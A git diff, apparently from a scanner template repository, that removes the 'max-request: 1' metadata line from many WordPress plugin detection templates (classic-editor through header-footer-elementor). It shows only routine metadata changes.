diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml
index ac80e4f31b..85965337cb 100644
--- a/http/technologies/wordpress/plugins/classic-editor.yaml
+++ b/http/technologies/wordpress/plugins/classic-editor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/classic-editor/
   metadata:
-    max-request: 1
     plugin_namespace: classic-editor
     wpscan: https://wpscan.com/plugin/classic-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml
index 15d7a24755..33d903a1b4 100644
--- a/http/technologies/wordpress/plugins/classic-widgets.yaml
+++ b/http/technologies/wordpress/plugins/classic-widgets.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/classic-widgets/
   metadata:
-    max-request: 1
     plugin_namespace: classic-widgets
     wpscan: https://wpscan.com/plugin/classic-widgets
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
index 40ccc15b27..3c6f8f287b 100644
--- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
+++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/click-to-chat-for-whatsapp/
   metadata:
-    max-request: 1
     plugin_namespace: click-to-chat-for-whatsapp
     wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml
index 1fad3cee08..c3b630cde2 100644
--- a/http/technologies/wordpress/plugins/cmb2.yaml
+++ b/http/technologies/wordpress/plugins/cmb2.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/cmb2/
   metadata:
-    max-request: 1
     plugin_namespace: cmb2
     wpscan: https://wpscan.com/plugin/cmb2
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml
index ebe4ee41a7..5c8ce709b6 100644
--- a/http/technologies/wordpress/plugins/coblocks.yaml
+++ b/http/technologies/wordpress/plugins/coblocks.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/coblocks/
   metadata:
-    max-request: 1
     plugin_namespace: coblocks
     wpscan: https://wpscan.com/plugin/coblocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml
index 5c32110e0e..aea47b9e84 100644
--- a/http/technologies/wordpress/plugins/code-snippets.yaml
+++ b/http/technologies/wordpress/plugins/code-snippets.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/code-snippets/
   metadata:
-    max-request: 1
     plugin_namespace: code-snippets
     wpscan: https://wpscan.com/plugin/code-snippets
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml
index 09c2e2f360..78c584c388 100644
--- a/http/technologies/wordpress/plugins/coming-soon.yaml
+++ b/http/technologies/wordpress/plugins/coming-soon.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/coming-soon/
   metadata:
-    max-request: 1
     plugin_namespace: coming-soon
     wpscan: https://wpscan.com/plugin/coming-soon
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
index 1a2e8beb3e..2c80d09c27 100644
--- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml
+++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/complianz-gdpr/
   metadata:
-    max-request: 1
     plugin_namespace: complianz-gdpr
     wpscan: https://wpscan.com/plugin/complianz-gdpr
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
index 706145493c..4b1b3a8754 100644
--- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7-honeypot/
   metadata:
-    max-request: 1
     plugin_namespace: contact-form-7-honeypot
     wpscan: https://wpscan.com/plugin/contact-form-7-honeypot
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml
index cf6a6ee635..06ad83bdf7 100644
--- a/http/technologies/wordpress/plugins/contact-form-7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7/
   metadata:
-    max-request: 1
     plugin_namespace: contact-form-7
     wpscan: https://wpscan.com/plugin/contact-form-7
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
index c039765929..b20666268f 100644
--- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-cfdb7/
   metadata:
-    max-request: 1
     plugin_namespace: contact-form-cfdb7
     wpscan: https://wpscan.com/plugin/contact-form-cfdb7
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml
index a2c92dff4b..b2a097bfe7 100644
--- a/http/technologies/wordpress/plugins/cookie-law-info.yaml
+++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-law-info/
   metadata:
-    max-request: 1
     plugin_namespace: cookie-law-info
     wpscan: https://wpscan.com/plugin/cookie-law-info
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml
index 41b5d6c854..c71fa258af 100644
--- a/http/technologies/wordpress/plugins/cookie-notice.yaml
+++ b/http/technologies/wordpress/plugins/cookie-notice.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-notice/
   metadata:
-    max-request: 1
     plugin_namespace: cookie-notice
     wpscan: https://wpscan.com/plugin/cookie-notice
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
index cca31cc3a9..5a98e67597 100644
--- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
+++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/creame-whatsapp-me/
   metadata:
-    max-request: 1
     plugin_namespace: creame-whatsapp-me
     wpscan: https://wpscan.com/plugin/creame-whatsapp-me
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
index ff9c0a49ce..4463174203 100644
--- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
+++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/creative-mail-by-constant-contact/
   metadata:
-    max-request: 1
     plugin_namespace: creative-mail-by-constant-contact
     wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml
index a76d3306bb..cfac0b961b 100644
--- a/http/technologies/wordpress/plugins/custom-css-js.yaml
+++ b/http/technologies/wordpress/plugins/custom-css-js.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-css-js/
   metadata:
-    max-request: 1
     plugin_namespace: custom-css-js
     wpscan: https://wpscan.com/plugin/custom-css-js
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml
index 2249681b6d..846761f2f7 100644
--- a/http/technologies/wordpress/plugins/custom-fonts.yaml
+++ b/http/technologies/wordpress/plugins/custom-fonts.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-fonts/
   metadata:
-    max-request: 1
     plugin_namespace: custom-fonts
     wpscan: https://wpscan.com/plugin/custom-fonts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
index b5389b27c9..0def6e61ca 100644
--- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
+++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-post-type-ui/
   metadata:
-    max-request: 1
     plugin_namespace: custom-post-type-ui
     wpscan: https://wpscan.com/plugin/custom-post-type-ui
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml
index 00d183f507..5c5decc127 100644
--- a/http/technologies/wordpress/plugins/disable-comments.yaml
+++ b/http/technologies/wordpress/plugins/disable-comments.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-comments/
   metadata:
-    max-request: 1
     plugin_namespace: disable-comments
     wpscan: https://wpscan.com/plugin/disable-comments
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
index 451e1daef1..a8229a338e 100644
--- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-gutenberg/
   metadata:
-    max-request: 1
     plugin_namespace: disable-gutenberg
     wpscan: https://wpscan.com/plugin/disable-gutenberg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml
index af30ca76b6..6559e64dce 100644
--- a/http/technologies/wordpress/plugins/duplicate-page.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-page.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-page/
   metadata:
-    max-request: 1
     plugin_namespace: duplicate-page
     wpscan: https://wpscan.com/plugin/duplicate-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml
index 93823466d4..a4368b8aa6 100644
--- a/http/technologies/wordpress/plugins/duplicate-post.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-post.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-post/
   metadata:
-    max-request: 1
     plugin_namespace: duplicate-post
     wpscan: https://wpscan.com/plugin/duplicate-post
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml
index e224283ecd..ec119e762a 100644
--- a/http/technologies/wordpress/plugins/duplicator.yaml
+++ b/http/technologies/wordpress/plugins/duplicator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicator/
   metadata:
-    max-request: 1
     plugin_namespace: duplicator
     wpscan: https://wpscan.com/plugin/duplicator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
index 9af8df08a7..b7ec7576a3 100644
--- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
+++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duracelltomi-google-tag-manager/
   metadata:
-    max-request: 1
     plugin_namespace: duracelltomi-google-tag-manager
     wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml
index d4081474c3..c42d679973 100644
--- a/http/technologies/wordpress/plugins/easy-fancybox.yaml
+++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-fancybox/
   metadata:
-    max-request: 1
     plugin_namespace: easy-fancybox
     wpscan: https://wpscan.com/plugin/easy-fancybox
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
index bcbc0707fb..fc44375947 100644
--- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
+++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-table-of-contents/
   metadata:
-    max-request: 1
     plugin_namespace: easy-table-of-contents
     wpscan: https://wpscan.com/plugin/easy-table-of-contents
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
index 8b23832297..a1616c1741 100644
--- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
+++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-wp-smtp/
   metadata:
-    max-request: 1
     plugin_namespace: easy-wp-smtp
     wpscan: https://wpscan.com/plugin/easy-wp-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml
index f0c3e4bc63..6cfb8bc272 100644
--- a/http/technologies/wordpress/plugins/elementor.yaml
+++ b/http/technologies/wordpress/plugins/elementor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/elementor/
   metadata:
-    max-request: 1
     plugin_namespace: elementor
     wpscan: https://wpscan.com/plugin/elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml
index eab4a0d725..9caaa53263 100644
--- a/http/technologies/wordpress/plugins/elementskit-lite.yaml
+++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/elementskit-lite/
   metadata:
-    max-request: 1
     plugin_namespace: elementskit-lite
     wpscan: https://wpscan.com/plugin/elementskit-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml
index 74c172ac94..5e6b557952 100644
--- a/http/technologies/wordpress/plugins/enable-media-replace.yaml
+++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/enable-media-replace/
   metadata:
-    max-request: 1
     plugin_namespace: enable-media-replace
     wpscan: https://wpscan.com/plugin/enable-media-replace
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml
index f5a63a2ed2..c5a665e6f7 100644
--- a/http/technologies/wordpress/plugins/envato-elements.yaml
+++ b/http/technologies/wordpress/plugins/envato-elements.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/envato-elements/
   metadata:
-    max-request: 1
     plugin_namespace: envato-elements
     wpscan: https://wpscan.com/plugin/envato-elements
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
index 25ca7328ef..a8b56b5df0 100644
--- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
+++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/essential-addons-for-elementor-lite/
   metadata:
-    max-request: 1
     plugin_namespace: essential-addons-for-elementor-lite
     wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
index cb1db5bee6..4e20e57107 100644
--- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
+++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ewww-image-optimizer/
   metadata:
-    max-request: 1
     plugin_namespace: ewww-image-optimizer
     wpscan: https://wpscan.com/plugin/ewww-image-optimizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
index a3207ea16a..6f6a416595 100644
--- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/facebook-for-woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: facebook-for-woocommerce
     wpscan: https://wpscan.com/plugin/facebook-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
index 2a4b772078..2dd0ef57b5 100644
--- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml
+++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/fast-indexing-api/
   metadata:
-    max-request: 1
     plugin_namespace: fast-indexing-api
     wpscan: https://wpscan.com/plugin/fast-indexing-api
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
index 366205085d..11942f4fa4 100644
--- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
+++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/favicon-by-realfavicongenerator/
   metadata:
-    max-request: 1
     plugin_namespace: favicon-by-realfavicongenerator
     wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml
index 598f08ce88..87c2aeb4bd 100644
--- a/http/technologies/wordpress/plugins/flamingo.yaml
+++ b/http/technologies/wordpress/plugins/flamingo.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/flamingo/
   metadata:
-    max-request: 1
     plugin_namespace: flamingo
     wpscan: https://wpscan.com/plugin/flamingo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml
index 42cdfb4475..3696eefbf7 100644
--- a/http/technologies/wordpress/plugins/fluentform.yaml
+++ b/http/technologies/wordpress/plugins/fluentform.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/fluentform/
   metadata:
-    max-request: 1
     plugin_namespace: fluentform
     wpscan: https://wpscan.com/plugin/fluentform
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml
index a1af263dbd..8bab0a9c3e 100644
--- a/http/technologies/wordpress/plugins/font-awesome.yaml
+++ b/http/technologies/wordpress/plugins/font-awesome.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/font-awesome/
   metadata:
-    max-request: 1
     plugin_namespace: font-awesome
     wpscan: https://wpscan.com/plugin/font-awesome
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
index 19265f910e..affd270123 100644
--- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/force-regenerate-thumbnails/
   metadata:
-    max-request: 1
     plugin_namespace: force-regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml
index c21d414695..1e6a62e23b 100644
--- a/http/technologies/wordpress/plugins/formidable.yaml
+++ b/http/technologies/wordpress/plugins/formidable.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/formidable/
   metadata:
-    max-request: 1
     plugin_namespace: formidable
     wpscan: https://wpscan.com/plugin/formidable
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml
index 91c89d0ad8..980265f531 100644
--- a/http/technologies/wordpress/plugins/forminator.yaml
+++ b/http/technologies/wordpress/plugins/forminator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/forminator/
   metadata:
-    max-request: 1
     plugin_namespace: forminator
     wpscan: https://wpscan.com/plugin/forminator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
index 539d9f7cec..daf205789d 100644
--- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml
+++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ga-google-analytics/
   metadata:
-    max-request: 1
     plugin_namespace: ga-google-analytics
     wpscan: https://wpscan.com/plugin/ga-google-analytics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
index f4123bb594..22bfa3ffe2 100644
--- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
+++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/gdpr-cookie-compliance/
   metadata:
-    max-request: 1
     plugin_namespace: gdpr-cookie-compliance
     wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
index 254f916291..7ed171d662 100644
--- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/
   metadata:
-    max-request: 1
     plugin_namespace: google-analytics-dashboard-for-wp
     wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
index 8074ac337e..ad238445fc 100644
--- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-for-wordpress/
   metadata:
-    max-request: 1
     plugin_namespace: google-analytics-for-wordpress
     wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
index b9de0ee313..7161671960 100644
--- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
+++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-listings-and-ads/
   metadata:
-    max-request: 1
     plugin_namespace: google-listings-and-ads
     wpscan: https://wpscan.com/plugin/google-listings-and-ads
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml
index 7b0f188ff7..2678f603c6 100644
--- a/http/technologies/wordpress/plugins/google-site-kit.yaml
+++ b/http/technologies/wordpress/plugins/google-site-kit.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-site-kit/
   metadata:
-    max-request: 1
     plugin_namespace: google-site-kit
     wpscan: https://wpscan.com/plugin/google-site-kit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
index 898e4de56d..20d947a5d1 100644
--- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
+++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-sitemap-generator/
   metadata:
-    max-request: 1
     plugin_namespace: google-sitemap-generator
     wpscan: https://wpscan.com/plugin/google-sitemap-generator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml
index 4a76856a69..22ee97b51f 100644
--- a/http/technologies/wordpress/plugins/gtranslate.yaml
+++ b/http/technologies/wordpress/plugins/gtranslate.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/gtranslate/
   metadata:
-    max-request: 1
     plugin_namespace: gtranslate
     wpscan: https://wpscan.com/plugin/gtranslate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml
index b321ca63eb..3f4c6c8936 100644
--- a/http/technologies/wordpress/plugins/gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/gutenberg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/gutenberg/
   metadata:
-    max-request: 1
     plugin_namespace: gutenberg
     wpscan: https://wpscan.com/plugin/gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
index 2b42c9f80c..fa1bb64115 100644
--- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
+++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/happy-elementor-addons/
   metadata:
-    max-request: 1
     plugin_namespace: happy-elementor-addons
     wpscan: https://wpscan.com/plugin/happy-elementor-addons
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
index dbea07a6da..da63d1cbf6 100644
--- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-code-manager/
   metadata:
-    max-request: 1
     plugin_namespace: header-footer-code-manager
     wpscan: https://wpscan.com/plugin/header-footer-code-manager
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
index 17a8f220cf..f94e7f6494 100644
